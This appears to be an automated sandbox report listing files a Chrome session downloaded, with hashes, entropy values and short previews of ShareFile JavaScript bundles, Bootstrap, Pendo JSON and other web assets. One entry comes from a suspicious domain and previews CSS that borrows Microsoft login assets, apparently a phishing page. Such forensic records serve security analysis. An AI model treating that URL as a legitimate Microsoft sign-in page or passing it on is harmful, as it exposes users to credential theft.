                                                                                                                                                                                                                                                                                Size (bytes):166904
                                                                                                                                                                                                                                                                                Entropy (8bit):5.29567611348278
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:Ze10ed17nqzxppbm/Lgh1aaZV0YYLAbafAbKcLu4TlhV4M:4Cs17nqzxppbsAbaIbKqu4/
                                                                                                                                                                                                                                                                                MD5:6ECE8CF8647F68F66C594FF97FE16702
                                                                                                                                                                                                                                                                                SHA1:D72303F3876985C9486B61EA5C680EA6E7CF8AF4
                                                                                                                                                                                                                                                                                SHA-256:BADEF088CF835FEB78870ED347F2C7515794419F5DAED0BF5C247331399FC55A
                                                                                                                                                                                                                                                                                SHA-512:09A3DE0ACFB01E7FD2070BC35847BAD65F1B15E49CC9276C96BDC15DC1B0233CD54B5CA1B532F3F2499A72DAA72112AEE744111E3E97C08F7A8B728E7C0E82FA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.UserRole=e.UserRole},function(e){r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Carousel=e.Carousel,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.Layout=e.Layout,i.List=e.List,i.Menu=e.Menu,i.Modal=e.Modal,i.Popconfirm=e.Popconfirm,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Tag=e.Tag,i.Tooltip=e.Tooltip,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){s.createPortal=e.createPort
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1199131
                                                                                                                                                                                                                                                                                Entropy (8bit):5.79200612177758
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:56BzJtkDg9TOA3UAWXw53ov8iBqhH8kaLvtptHpITt8YwXlzzA:wlJyDg9TOA3UAWXviH8kaLvtptHpITtt
                                                                                                                                                                                                                                                                                MD5:5330D2180773E126082327CDE098052B
                                                                                                                                                                                                                                                                                SHA1:53699B2260BBD7DE7B5245FE2E3F090D50739096
                                                                                                                                                                                                                                                                                SHA-256:0F28074F0BEFAC89C11AFAAD402B60838DD059294FF897864A7F98522302F65B
                                                                                                                                                                                                                                                                                SHA-512:B402C757D0B9621DBC57691951FFA590C8B3CF0C086BE7FC65D1B1BCC3B4A9F3F2883D696709A3E6E927A2626C975BFA5EB3CB4728F29275F1F1C3A8A7CC6021
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},o={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.colorPalette=e.colorPalette},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Checkbox=e.Checkbox,r.Collapse=e.Collapse,r.DatePicker=e.DatePicker,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.Select=e.Select,r.Slider=e.Slider,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a["default"]=e["default"]},function(e){o.Redirect=e.Redirect},function(e){s.__awaiter=e.__awaiter,s.__rest=e.__rest}],execute:function(){e((()=>{var e,c,l={4300:(e,t,n)=>{"use strict";n.d(t,{A:()=>ae});var r=function(){function e(e){var t=this;this._insertTag=function(e){var n;n=0===t.tags.length?t.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65299)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):80663
                                                                                                                                                                                                                                                                                Entropy (8bit):5.204798779868606
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Qmw0iELO+TBR2t472RirWyKsVfK5GEfy3YJtCRv/45wZbqbXZTbYWU178:VwXza3YCl45wZODZTbYR8
                                                                                                                                                                                                                                                                                MD5:6BAF57F25796C332144ED58A2A0CD9EE
                                                                                                                                                                                                                                                                                SHA1:F7FD0F3DC84B2CF93BF81E832505A673F354E0A3
                                                                                                                                                                                                                                                                                SHA-256:82F64F62BB03C1BC1824B0F9C9E05F70DBA33E146818E63CDF5C306C8CF3DEDD
                                                                                                                                                                                                                                                                                SHA-512:5FF6240D9CA34DFE30C9CD95CB5E981823C7C0063CAD9258F8F3A0A24663401DA684844524272410673A6325FD78DB0F7E7D0FCD3844B8DB3EB9AA2613908EE8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*!. * Bootstrap v5.3.2 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t=new Map,e={set(e,i,n){t.has(e)||t.set(e,new Map);const s=t.get(e);s.has(i)||0===s.size?s.set(i,n):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(s.keys())[0]}.`)},get:(e,i)=>t.has(e)&&t.get(e).get(i)||null,remove(e,i){if(!t.has(e))return;const n=t.get(e);n.delete(i),0===n.size&&t.delete(e)}},i="transitionend",n=t=>(t&&window.CSS&&window.CSS.escape&&(t=t.replace(/#([^\s"#']+)/g,((t,e)=>`#${CSS.escape(e)}`))),t),s=t=>{t.dispatchEvent(new Event(i))},o=t=>!(!t||"o
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):458835
                                                                                                                                                                                                                                                                                Entropy (8bit):5.481653938855946
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:aA3p1f/h6/XRAdbPWb5nAO3nUM4Eyl0r8B+x6M2V2OwIr:aAh8RAfOzJM0rqixIr
                                                                                                                                                                                                                                                                                MD5:735CBA16BF1442C21B8FA8E78AA8E83A
                                                                                                                                                                                                                                                                                SHA1:D55ED9608E0C39F5EE38494238BBEECB0A43AD04
                                                                                                                                                                                                                                                                                SHA-256:6B624BCD118EB8A238E333374B68349510FF0FEC6B843F5F46CE09A2DB176879
                                                                                                                                                                                                                                                                                SHA-512:2F36C8BDC7DA84EF5D2DD5CEECE732670CDE5D5852E8F39AC17FF529C0209FFE19A371DF664BFFCA95080546DFF485D23FBAA72AF0C01C53219221B0EEC765D0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Avatar=e.Avatar,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Dropdown=e.Dropdown,r.Popover=e.Popover,r.Result=e.Result,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Switch=e.Switch,r.Typography=e.Typography,r.notification=e.notification},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){o.findDOMNode=e.findDOMNode},function(e){s.useHistory=e.useHistory},function(e){a.useHistory=e.useHistory},function(e){c.__awaiter=e.__awaiter,c.__rest=e.__rest}],execute:function(){e((()=>{var e,u,l={6952:(e,t,n)=>{"use strict";n.d(t,{XK:()=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, was "main.bundle.js", last modified: Mon Sep 9 20:00:08 2024, from Unix, original size modulo 2^32 141304
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41618
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994152214229324
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:CdNzUh9MZ4rjJcOi6lchaAcDaVpKUxrwCv2x64dqC1KSKA0m7e:CdNoE4uML8M+2SC1LKpm7e
                                                                                                                                                                                                                                                                                MD5:B5949B3BE4687909B13B22DFBA27D0EA
                                                                                                                                                                                                                                                                                SHA1:B16A1E63AEA899903B13FB2F970230A267A4CFB3
                                                                                                                                                                                                                                                                                SHA-256:258FD99067EC61C83A64592F068CB37B9621EB39C52A8B15D3F921DC19D697DD
                                                                                                                                                                                                                                                                                SHA-512:498A7A6DDA0EDB96844B462F486F69CCFEFE1B31966B322F80673170D2D99B004965D67CC87D93EEAEA145D182DF20FBA5B33078912BC5CBB74DAB9D5B237C70
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.....S.f..main.bundle.js..[.s.F..+".N..#.R.{.h..q..\./r.UG1*.....1.``Y+r..}=......rU{uW...y.....Ao.T3-d.W..B...a;.'2.X....b5..&.9=.."..z..._K...a.e...YQ..N]9.,<../e..0.$.t+.U^1..r..y.R.....T.c......t:..Q..J..........W......:......x.C.T..<...~.....~5.....jy...n.......x..]e..7%...{.sts.k..w..,.:...........2....<.[..A..T.I3U..5..S.K.L..mk.;.f....US.....A".!.b.J....>..*4V}i..._..u..*6.v"@E...x.uw..1.SQ..]L%....xT.l....s..jGm.vT.:.......,*"H..4....c.ZI-i.._.U.YV.......Ip../..6...y......]...~Tp.V...".j...T..b~2.!(F...dy.....Ya...P...V.U.E...t53-Ug..4\._.S..tj..M`.>.:K.^...._l.X.)............[g.1.....4.".k...j..3..E).B..^3...[.&.Y..y..;..5.un..;. ....T....W.e5s.*~g....YQ.x.k.d1..oR..82.".SQ.........^ .%..fO.c.......u.=Z....]..V..-y....._.J/8.....[...&a...P..:.....".L.u..X=..t..QxD}f..Uu)f..tB..qT.[....G......]<..9..j.k3]W..;......._.|A.~....F....A..=..[7{.......q4m..R@.i.<...J...X.y5...%,3...{.6N.....x[.0..j}..V.?.P....I.'[E0..-D.n.R*.K#..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):123022
                                                                                                                                                                                                                                                                                Entropy (8bit):5.380750016671545
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:czeKp+LVxRqlZC4pt5tDu+KenVH/qOjagGHkoF+fOsi/mk144:ca7VxRqu4ttD/BG5kO/7b
                                                                                                                                                                                                                                                                                MD5:88FE5AF93A34045D123F8553A1D1F252
                                                                                                                                                                                                                                                                                SHA1:367EE95CE0506BDD13B0F548BC252C49388AE56D
                                                                                                                                                                                                                                                                                SHA-256:0920ECC552C22FA97C56F9651F5A00048ACA19A90657A7E2470B3A14067C4C9D
                                                                                                                                                                                                                                                                                SHA-512:20A878C7D4D130F818FB7EB98644E24ACA65D96DD6EBEC0D3E7D0D1140992054EA0656DB269AB825797ED9A802718D7CC07FAFD2B5C2C96B94E86887BA5EEDF7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n.isNote=e.isNote,n.isRequestListBundle=e.isRequestListBundle,n.isSymbolicLink=e.isSymbolicLink,n.isWorkflowBundle=e.isWorkflowBundle},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Empty=e.Empty,o.Flex=e.Flex
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (22063), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):22064
                                                                                                                                                                                                                                                                                Entropy (8bit):4.8654655187166815
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:5OhzKJPKAzEf7PBVqxj2E6SgTIaFSgTId6jJi9NhKjUcSgTI5bSgTId6MfKKw3s6:HnKtxCQxwWHpEV+bi
                                                                                                                                                                                                                                                                                MD5:D2702DCFED567BCA070F8FC55EE3BBE6
                                                                                                                                                                                                                                                                                SHA1:13B0C79DBD613889BDD32D6234DAE9CAEAA3CE8C
                                                                                                                                                                                                                                                                                SHA-256:B530C482126F2B86447E3A7E6F9319C8FCCD071659A3BAF914E8C51589AEF220
                                                                                                                                                                                                                                                                                SHA-512:8EEF7953E5B4623BEB6A423CB05D675E881D6B761EB5B5B7A4DCE0778B5F016452F37F907EE401D7E291204980AA521EB6E58C6D17D9ED81B7B2A66AC0E2F6AC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"props":{"id":"pendo-base","data-layout":"tooltipBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-0978f7b0:hover","styles":{"color":"#D9D7D7"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]::placeholder","styles":{"color":"#999999FF"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]:focus","styles":{"outline":"none","box-shadow":"#00000080 0px 0px 2px 0px"}},{"selector":"#pendo-button-bca5c491:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"#pendo-button-799bec88:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #FFFFFF","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"div[tabindex=-1]:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-XNJ1F6ATudKnb82a7viL5T2TM6g","data-vertical-alignment":"Relative to Element","data-
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65455)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):172013
                                                                                                                                                                                                                                                                                Entropy (8bit):5.431081569709545
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:9fq+1sppQR2Ly8Dl4YsgJ2mmuf85S63YBxSjaO8CW:9vsppQoLyDYsgJ9muf8I60IdC
                                                                                                                                                                                                                                                                                MD5:1B4BEF66080AA287B1D9E5454FB07741
                                                                                                                                                                                                                                                                                SHA1:621C5DBABD3ED48B1FA2064891EA257CAE258DB1
                                                                                                                                                                                                                                                                                SHA-256:484C55D3B30B3EC6E1A967A348DAE66E5BF17DF6AEF6ABBF90D6BD824CBCA983
                                                                                                                                                                                                                                                                                SHA-512:A5AC1F4515BF497CF8E3C07795001F247B3A092A8AB3E755D884075A99C731E5782E303011E6BAB28596BE0637CF775E713FFA1B1DD34016A63364E1595D80DE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{}).System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){n["default"]=e["default"],n.findDOMNode=e.findDOMNode,n.flushSync=e.flushSync},function(e){o.Route=e.Route,o.Router=e.Router,o.Switch=e.Switch,o.useHistory=e.useHistory},function(e){i.__assign=e.__assign,i.__awaiter=e.__awaiter,i.__generator=e.__generator,i.__makeTemplateObject=e.__makeTemplateObject,i.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var e,a,s={458:(e,t,r)=>{"use strict";r.d(t,{AE:()=>j,jQ:()=>O,Qj:()=>C});var n=r(9669),o=r.n(n),i=r(4998),a=undefined&&undefined.__assign||function(){return a=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},a.apply(this,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (46254)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):133462
                                                                                                                                                                                                                                                                                Entropy (8bit):5.386115732806718
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:7st4ceI7j1jcp0TRQ8Up0yRBS7pmrI8RYo:ot/n7jxcp0sp0CS7pm5
                                                                                                                                                                                                                                                                                MD5:339B13B91CE8CF7CAD214117EA302B1F
                                                                                                                                                                                                                                                                                SHA1:98F3C31699CE0C6516E366AFE421F3D941309A6A
                                                                                                                                                                                                                                                                                SHA-256:BDF4BB9CE620D4819A9D3FEB0738321607788FD880621C2A21B6DBF8CB711032
                                                                                                                                                                                                                                                                                SHA-512:277031BCF440735B1511B8C8EAC52F867631C77AF6D81BE6D531469B646B157563D2A821B5FAF41155C2E1AFBEFAFB92CF87BDA57FA1B2730791BF2276DB975A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Badge=e.Badge,o.Breadcrumb=e.Breadcrumb,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.DatePicker=e.DatePicker,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.InputNumber=e.InputNumber,o.Layout=e.Layout,o.Modal=e.Modal,o.Pagination=e.Pagination,o.Popconfirm=e.Popconfirm,o.Progr
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (567), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):6341
                                                                                                                                                                                                                                                                                Entropy (8bit):5.114798851154897
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:tUcqUcFRqm1YvI7Hazo/kBRoZRKZZPcAXahBG2Jz+rx/WrICZP//:tUcqUcFkm1gI7Hazo8boZRKuA5MJ
                                                                                                                                                                                                                                                                                MD5:FF6058356639256BF8831A9163C23D1E
                                                                                                                                                                                                                                                                                SHA1:77470FA9FDCC214A296B75A0519E50F789C08EE0
                                                                                                                                                                                                                                                                                SHA-256:2D0A6DCBDA10E51E78FA4BA5DA72473C28F9073B0DF7C59F7549AB55E48A94CB
                                                                                                                                                                                                                                                                                SHA-512:1DD14258725EC9F72B6F47589599D57CF72D482B7F473C12ABDBEC2C5632BF3EA24CE62AE5B55A4BEC148824B9C5AA979F7A6CE383C6EC42C36F53789587EC97
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/cxx/ZXHM8GZZKMRBMPRJX9LIZJJHS
                                                                                                                                                                                                                                                                                Preview:*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}..*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}...form-group{margin-bottom:12px;}...c_loadingDots{line-height:0;white-space:nowrap;position:relative;visibility:hidden;}..div.c_loadingDots.c_dotsPlaying{visibility:visible;}..div.c_loadingDots div.c_loadingDot{position:absolute;left:0;bottom:0;}..div.c_loadingDots div.c_loadingFallback{position:absolute;left:0;top:0;width:100%;height:100%;background:transparent url('https://acctcdn.msauth.net/images/clear1x1.png') no-repeat center center;opacity:1;filter:alpha(opacity=100);-moz-animation:hidedotsfallback .3s linear .1s 1 normal;-ms-animation:hidedotsfallback .3s linear 0s 1 normal;-webkit-animation:hidedotsfallback .3s linear 0s 1 normal;animation:hidedotsfallback .3s linear 0s 1 normal;-moz-animation-fill-mode:both;-ms-animation-fill-mode:both;-webkit-animation-fill-mode:both;animation-fill-mode:both;}..d
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65455)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):172013
                                                                                                                                                                                                                                                                                Entropy (8bit):5.431081569709545
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:9fq+1sppQR2Ly8Dl4YsgJ2mmuf85S63YBxSjaO8CW:9vsppQoLyDYsgJ9muf8I60IdC
                                                                                                                                                                                                                                                                                MD5:1B4BEF66080AA287B1D9E5454FB07741
                                                                                                                                                                                                                                                                                SHA1:621C5DBABD3ED48B1FA2064891EA257CAE258DB1
                                                                                                                                                                                                                                                                                SHA-256:484C55D3B30B3EC6E1A967A348DAE66E5BF17DF6AEF6ABBF90D6BD824CBCA983
                                                                                                                                                                                                                                                                                SHA-512:A5AC1F4515BF497CF8E3C07795001F247B3A092A8AB3E755D884075A99C731E5782E303011E6BAB28596BE0637CF775E713FFA1B1DD34016A63364E1595D80DE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{}).System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){n["default"]=e["default"],n.findDOMNode=e.findDOMNode,n.flushSync=e.flushSync},function(e){o.Route=e.Route,o.Router=e.Router,o.Switch=e.Switch,o.useHistory=e.useHistory},function(e){i.__assign=e.__assign,i.__awaiter=e.__awaiter,i.__generator=e.__generator,i.__makeTemplateObject=e.__makeTemplateObject,i.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var e,a,s={458:(e,t,r)=>{"use strict";r.d(t,{AE:()=>j,jQ:()=>O,Qj:()=>C});var n=r(9669),o=r.n(n),i=r(4998),a=undefined&&undefined.__assign||function(){return a=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},a.apply(this,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 44662
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):15838
                                                                                                                                                                                                                                                                                Entropy (8bit):7.9857449109303
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:uAkOpH6Xz726BDb7DxpT4W/6EQFqiDaiy7fZzU4IqKCzLApTPi:NkOpH6f2eDbxpMqQFjWhZgCgPi
                                                                                                                                                                                                                                                                                MD5:1FFE574A5BF39AD4F79875BE0929559A
                                                                                                                                                                                                                                                                                SHA1:485A4F0A3FFD6E16CB6B55ECDF8AB43F8BD416B2
                                                                                                                                                                                                                                                                                SHA-256:17CCC23F84FB9728FD31183C13F7327443B5928A5BDAD486807611A5BCDA68C5
                                                                                                                                                                                                                                                                                SHA-512:F0E7F983C1B2C28BB28BB88139AC724052BB71C980B26780C6F91A84C41C57D47F977273587C2754754A36DE124B208E877C61DC6DCC4D8A15C26EBD35B54C35
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
